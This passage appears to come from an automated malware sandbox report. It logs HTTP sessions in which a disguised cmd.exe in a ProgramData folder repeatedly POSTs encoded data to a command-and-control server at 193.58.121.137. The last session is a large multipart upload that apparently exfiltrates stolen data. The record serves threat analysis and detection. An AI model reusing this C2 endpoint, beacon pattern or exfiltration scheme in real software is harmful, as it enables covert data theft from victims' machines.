Jan 3, 2025 20:49:03.468544960 CET	80	50101	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:03.468641043 CET	50101	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:03.468750000 CET	50101	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:03.473582029 CET	80	50101	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:03.826119900 CET	50101	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:03.831118107 CET	80	50101	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:03.831134081 CET	80	50101	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:03.831146002 CET	80	50101	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:04.189882994 CET	80	50101	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:04.247710943 CET	50101	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:04.324601889 CET	80	50101	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:04.372721910 CET	50101	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:08.228152037 CET	80	50100	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:08.228207111 CET	50100	80	192.168.2.4	193.58.121.137
Jan 3, 2025 20:49:09.291805983 CET	80	50101	193.58.121.137	192.168.2.4
Jan 3, 2025 20:49:09.292018890 CET	50101	80	192.168.2.4	193.58.121.137

HTTP Request Dependency Graph

193.58.121.137

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:39.219044924 CET	396	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:39.576263905 CET	344	OUT	Data Raw: 00 05 01 01 06 0d 04 05 05 06 02 01 02 0d 01 00 00 0b 05 0c 02 04 03 00 00 03 0d 0d 05 06 01 00 0a 05 03 0f 00 00 04 04 0e 07 04 05 00 06 04 06 03 03 0c 00 0d 04 07 06 06 01 05 03 04 07 04 0f 00 53 0d 0e 07 54 01 06 0f 0f 0f 01 0d 51 0b 05 04 07 Data Ascii: STQ]QTT\L}U\|s~tLquu^\|e`U\|\|kXl\|[opX}sStItiO~V@xCP}rW
Jan 3, 2025 20:47:39.859349966 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:39.900854111 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:39 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1352 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 56 4a 7e 4c 7b 43 7b 49 6c 72 5a 49 7f 62 63 07 7d 59 5d 41 68 63 69 0a 79 5d 7f 5f 69 61 63 5a 77 60 7e 51 6d 07 65 4b 76 75 7f 59 7e 4b 78 01 55 4b 71 0a 74 71 63 02 7c 62 75 06 7f 59 50 0b 7b 48 70 0b 6a 63 74 5d 76 62 61 4c 60 58 75 02 7f 4f 5b 5b 7d 6c 56 41 6a 77 7b 49 76 76 7b 06 7c 5b 7d 01 7d 70 62 59 6f 59 5d 5e 78 77 6b 59 79 7e 67 05 7a 04 70 03 6f 73 72 4e 68 60 6b 5b 6c 5e 73 5a 6a 04 67 05 62 72 64 02 7a 51 41 5b 6b 01 63 55 7d 71 65 40 76 6f 7c 07 7b 42 7c 03 63 60 50 43 7b 72 71 47 6a 6c 50 4c 6f 5f 5b 5a 76 4d 74 5f 75 71 64 02 63 5f 76 50 7e 5d 79 5f 77 5b 7d 01 76 65 68 09 68 42 65 00 77 7c 70 04 7e 73 6c 07 6f 6f 7c 5a 7a 63 76 01 7c 6d 7c 08 76 64 7c 05 69 62 66 09 6a 0b 73 0d 6f 53 71 5f 7f 61 65 07 7b 5d 46 51 7c 6c 7f 55 7e 06 7b 55 7d 49 5c 00 6c 53 63 06 7b 04 68 46 7c 72 77 44 7e 5e 7c 52 6b 70 76 55 6e 5d 6f 58 7d 4c 6c 02 60 4d 69 51 7b 5c 79 06 76 76 56 01 7d 66 5a 04 7d 76 75 0a 77 62 73 06 7d 62 65 42 7f 59 66 0d 79 66 70 40 7c 63 7f 04 76 4c 7d 4f 77 71 7d 00 7e 71 [TRUNCATED] Data Ascii: VJ~L{C{IlrZIbc}Y]Ahciy]_iacZw`~QmeKvuY~KxUKqtqc\|buYP{Hpjct]vbaL`XuO[[}lVAjw{Ivv{\|[}}pbYoY]^xwkYy~gzposrNh`k[l^sZjgbrdzQA[kcU}qe@vo\|{B\|c`PC{rqGjlPLo_[ZvMt_uqdc_vP~]y_w[}vehhBew\|p~sloo\|Zzcv\|m\|vd\|ibfjsoSq_ae{]FQ\|lU~{U}I\lSc{hF\|rwD~^\|RkpvUn]oX}Ll`MiQ{\yvvV}fZ}vuwbs}beBYfyfp@\|cvL}Owq}~qPlp~YQKvqYJzbq\|`a{YtNxYxMxCkzrdFxc~\|`ZI{Y\|I~\vqVG~Bc\|YtA}aWu\|\|N{Rhw^rz_WG~BT{_~wcgu_lw_zCpTvbmLv[\|lut\|p\|cpIx\|wx`P}}^ww^A~bT@}m]B{}f}La`t\|BtC`x\|gfLz}{{L\|Hac~Y\|pqOyMl~rlvceOzOiDvvVH~vxM}v[OwbbeB\|gX{flA}]gIuLuta_qbF}ltwQKwqUIxr[}^_Dyw`xIhxSwzLRFxc~O{]NZltcZjbRZuXxH}Ro\|^`kmAbw^zl\|vsfA{au}BT_z\y\}b`g{ZL~Jx^T`[uMwu^hb_t\|^\|shDll`YlYb}moTw^`NbrOzSYQQurjaQYwK{QNP~Nx\|wbLxmYJl\d\|bg\|dgOhNyy`hjrVwMayaiZw\B[igASu@c^FjzYQkeUUhQ\|^{t\iu_}I\|LI\|^P\|px]bbGW~n^RcUoUS`pR]SOwkW}D{]NZlcEPqNbYEk\|^h]NP\}qSZQAsk[}K}\CYie@VrKbZF`Zc[OS_}Acqm\wXswfkyFpU]YS{@RoRBWXJhn]I[yiaTzSYQaTa
Jan 3, 2025 20:47:39.900871992 CET	345	IN	Data Raw: 05 79 70 5c 41 51 59 42 51 7e 7b 73 57 6a 63 08 4f 51 7b 61 5a 54 6e 07 55 6f 04 08 00 53 5b 60 4a 56 66 78 4e 6b 73 65 51 7b 5e 73 63 65 4f 7c 42 70 5a 54 54 56 06 72 40 5c 65 55 42 51 5e 08 5d 52 01 6e 4d 5d 7e 78 06 66 5b 76 41 68 60 7a 0f 7f Data Ascii: yp\AQYBQ~{sWjcOQ{aZTnUoS[`JVfxNkseQ{^sceO\|BpZTTVr@\eUBQ^]RnM]~xf[vAh`z^oMRo`\buzb]r~km~X\|{WjdDZ}d^TaVjFRtUAldgZme\|\|\t{]NZlcEPqNbYEkxDP]cHPXbL\}^WodXv]}vV~R{qtWbeHY`x[q\B_caORsKcT@`APU\]okYx]VZx\|wG{NvJ@pJp^
Jan 3, 2025 20:47:40.121293068 CET	345	IN	Data Raw: 05 79 70 5c 41 51 59 42 51 7e 7b 73 57 6a 63 08 4f 51 7b 61 5a 54 6e 07 55 6f 04 08 00 53 5b 60 4a 56 66 78 4e 6b 73 65 51 7b 5e 73 63 65 4f 7c 42 70 5a 54 54 56 06 72 40 5c 65 55 42 51 5e 08 5d 52 01 6e 4d 5d 7e 78 06 66 5b 76 41 68 60 7a 0f 7f Data Ascii: yp\AQYBQ~{sWjcOQ{aZTnUoS[`JVfxNkseQ{^sceO\|BpZTTVr@\eUBQ^]RnM]~xf[vAh`z^oMRo`\buzb]r~km~X\|{WjdDZ}d^TaVjFRtUAldgZme\|\|\t{]NZlcEPqNbYEkxDP]cHPXbL\}^WodXv]}vV~R{qtWbeHY`x[q\B_caORsKcT@`APU\]okYx]VZx\|wG{NvJ@pJp^
Jan 3, 2025 20:47:40.168848038 CET	372	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 380 Expect: 100-continue
Jan 3, 2025 20:47:40.363717079 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:40.363887072 CET	380	OUT	Data Raw: 5f 52 5c 58 59 47 5a 52 5a 5c 55 51 59 5e 54 57 56 51 5d 42 50 52 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _R\XYGZRZ\UQY^TWVQ]BPRZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@< '_'X)22,]((?B$>6*U3^,%#'0('_!%Y)7
Jan 3, 2025 20:47:40.558882952 CET	324	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:40 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 26 1c 27 1f 38 53 27 3b 28 09 25 39 31 0e 3c 3c 02 1d 3a 1f 0e 5a 22 2a 2f 56 3d 33 2f 02 3e 3c 3c 11 21 2f 04 56 35 01 21 11 2b 2a 23 5b 03 1d 22 59 22 21 2e 5e 25 29 2a 01 2c 20 3c 44 25 3d 3d 59 28 58 29 52 23 10 35 0c 23 2d 20 52 3b 30 39 5a 26 2f 2c 06 28 3e 3d 05 33 3f 21 51 00 10 39 12 30 33 22 04 25 2c 3e 12 31 04 26 00 30 36 3b 5b 22 2f 3a 50 26 06 21 5e 2f 21 2b 0c 31 0c 2c 50 36 20 3c 18 3e 07 21 1e 32 01 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: &'8S';(%91<<:Z"/V=3/><<!/V5!+#["Y"!.^%), <D%==Y(X)R#5#- R;09Z&/,(>=3?!Q903"%,>1&06;["/:P&!^/!+1,P6 <>!2"_ R1\Q
Jan 3, 2025 20:47:40.559545040 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:40.873181105 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:40.903309107 CET	2560	OUT	Data Raw: 5a 55 5c 5e 5c 47 5a 57 5a 5c 55 51 59 5b 54 51 56 5e 5d 48 50 50 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZU\^\GZWZ\UQY[TQV^]HPPZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%) 0X)2')[1Z+<8(4!%>R*3+Y9%=\ Q8('_!%Y)3
Jan 3, 2025 20:47:41.187624931 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V
Jan 3, 2025 20:47:41.187889099 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1440 Expect: 100-continue
Jan 3, 2025 20:47:41.411417961 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:41.414933920 CET	1440	OUT	Data Raw: 5f 53 59 5e 5c 44 5a 57 5a 5c 55 51 59 59 54 55 56 5f 5d 41 50 56 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _SY^\DZWZ\UQYYTUV_]APVZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+30'-"2%1++<<$%2T( 3^,&!X4Q'R+='_!%Y)
Jan 3, 2025 20:47:41.739913940 CET	324	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:41 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 25 06 25 26 2f 09 27 06 3c 0a 27 04 0b 0f 28 05 23 09 2d 08 2c 13 36 03 3b 56 29 20 38 13 29 3f 20 13 36 3c 29 0c 22 2f 2e 06 2a 2a 23 5b 03 1d 22 5f 21 22 31 06 25 29 03 5a 38 0e 0e 42 26 3d 0f 5f 2b 2e 07 53 23 07 21 0a 22 00 30 55 2f 55 3e 02 26 2c 3f 5e 29 3d 08 13 30 15 21 51 00 10 3a 09 24 1d 1b 5c 33 3c 0c 5b 32 13 39 11 27 25 27 5a 21 12 2e 53 25 01 3a 01 2f 0b 3c 56 26 32 0a 53 36 33 06 16 2a 29 0f 1c 32 11 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: %%&/'<'(#-,6;V) 8)? 6<)"/.*#["_!"1%)Z8B&=_+.S#!"0U/U>&,?^)=0!Q:$\3<[29'%'Z!.S%:/<V&2S63)2"_* R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:40.329499960 CET	372	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 384 Expect: 100-continue
Jan 3, 2025 20:47:40.694832087 CET	384	OUT	Data Raw: 5f 5f 5c 5f 5c 43 5a 51 5a 5c 55 51 59 5a 54 52 56 5a 5d 41 50 55 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: __\_\CZQZ\UQYZTRVZ]APUZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%G)3,'-*%7%, \(=??%%-=U>U -%#'++-'_!%Y)7
Jan 3, 2025 20:47:41.060632944 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:41.191145897 CET	324	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:40 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 25 03 24 36 3b 09 24 3b 2b 51 33 14 03 0b 28 3f 27 44 39 31 3c 5e 36 04 2c 0a 3e 33 01 03 3d 11 05 03 35 11 2e 51 36 01 3e 03 2b 3a 23 5b 03 1d 21 06 20 21 2e 12 25 29 39 10 2f 0e 3f 1d 31 2d 39 5f 2b 58 2e 09 21 3e 36 56 35 10 15 0d 38 20 3e 01 27 02 01 5e 28 2e 39 02 24 2f 21 51 00 10 39 54 26 30 39 5f 25 2c 32 12 32 3d 00 04 24 26 23 13 23 2c 0c 1a 31 3b 39 12 2d 32 3c 57 31 32 02 56 35 33 37 05 3e 17 3d 50 26 2b 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: %$6;$;+Q3(?'D91<^6,>3=5.Q6>+:#[! !.%)9/?1-9_+X.!>6V58 >'^(.9$/!Q9T&09_%,22=$&##,1;9-2<W12V537>=P&+"_* R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:41.532927036 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:41.888257980 CET	2560	OUT	Data Raw: 5f 56 5c 5a 59 40 5a 55 5a 5c 55 51 59 5a 54 54 56 5b 5d 47 50 54 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _V\ZY@ZUZ\UQYZTTV[]GPTZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+0/]$="&5Z&?#+-8+)&-T*#'.5#/+'_!%Y)7
Jan 3, 2025 20:47:42.176409006 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:42.318356991 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:42.629589081 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:47:43.173430920 CET	2560	OUT	Data Raw: 5f 55 59 59 59 42 5a 55 5a 5c 55 51 59 5f 54 53 56 58 5d 41 50 5c 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _UYYYBZUZ\UQY_TSVX]AP\Z\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+0]$)Z%Q9X&?,<?B5$>=(04-64V+'_!%Y)#
Jan 3, 2025 20:47:43.269217968 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:43.396414995 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:43.533195972 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:43.887830019 CET	2560	OUT	Data Raw: 5a 56 59 5f 59 42 5a 54 5a 5c 55 51 59 5a 54 50 56 58 5d 45 50 5c 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZVY_YBZTZ\UQYZTPVX]EP\Z^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+ 0!%5%?<?=/V(')&-5>3$,6=] '('_!%Y)7
Jan 3, 2025 20:47:44.213927031 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:47:44.355870962 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:47:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:44.506268024 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:44.856565952 CET	2560	OUT	Data Raw: 5f 53 5c 5c 59 41 5a 55 5a 5c 55 51 59 5f 54 5b 56 5e 5d 47 50 57 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _S\\YAZUZ\UQY_T[V^]GPWZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%??\$>1]1Y'?,??<>V&X*=7Y9 ;?='_!%Y)#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:47:45.042929888 CET	443	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----6V07bb5SvJtEV85TMFuIzJ8rpxR8Ce0HWm User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 127510 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:47:45.388192892 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 36 56 30 37 62 62 35 53 76 4a 74 45 56 38 35 54 4d 46 75 49 7a 4a 38 72 70 78 52 38 43 65 30 48 57 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------6V07bb5SvJtEV85TMFuIzJ8rpxR8Ce0HWmContent-Disposition: form-data; name="0"Content-Type: text/plain_TY^\F_PZ\UQYWTUV[]HP\ZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_
Jan 3, 2025 20:47:45.393309116 CET	4944	OUT	Data Raw: 5a 2f 5a 6c 53 65 33 54 51 76 50 39 52 2b 4a 45 45 5a 65 76 65 6c 7a 4c 42 6a 78 6e 36 37 6d 4b 64 4f 42 42 66 69 36 33 72 63 4c 72 78 4c 4d 56 56 77 57 44 6d 6f 78 5a 71 74 68 30 48 4b 51 32 6a 2b 37 75 50 36 33 37 6f 53 58 50 54 57 4f 47 77 58 Data Ascii: Z/ZlSe3TQvP9R+JEEZevelzLBjxn67mKdOBBfi63rcLrxLMVVwWDmoxZqth0HKQ2j+7uP637oSXPTWOGwXpCVmVHM4uOmqhd7amgliOz4nVh2smMOfdbE1UW2FzbIqhbljZt3Q1HnUkTC89z2OSZ17tqLtsP/tE36zVJ+JlJWqBYxwvv0k2n7jy07tHyccTsDANPzGVdTDrBIdY9vcO7Aia/JuMRZtMb3xkco9JuapYYDSOqr95
Jan 3, 2025 20:47:45.393358946 CET	7416	OUT	Data Raw: 50 78 78 51 54 48 42 48 4e 34 49 41 78 42 36 36 68 4a 64 49 62 6a 79 2f 45 44 39 49 62 38 79 64 66 7a 6f 72 57 76 4c 4a 4c 30 4a 32 53 56 30 63 76 38 32 38 63 73 5a 38 41 75 33 61 45 75 50 59 76 4e 50 63 31 69 77 52 6a 72 64 49 4f 2b 69 54 50 2f Data Ascii: PxxQTHBHN4IAxB66hJdIbjy/ED9Ib8ydfzorWvLJL0J2SV0cv828csZ8Au3aEuPYvNPc1iwRjrdIO+iTP/aWG67l3Aphbi/e9BrnfpyDA3qljc3LnqxE++ua7rIc/CDtuRP/M2R0u6hxoU3/1e1+GkvhJMRkHFGMYuKsYaNdbs7QsneKH0zH8A7GF956nz+seUQLOo4NqqtfPruJzXM+bP7YqMOBA/zNI7aO5rBq9PvRi06zSSj
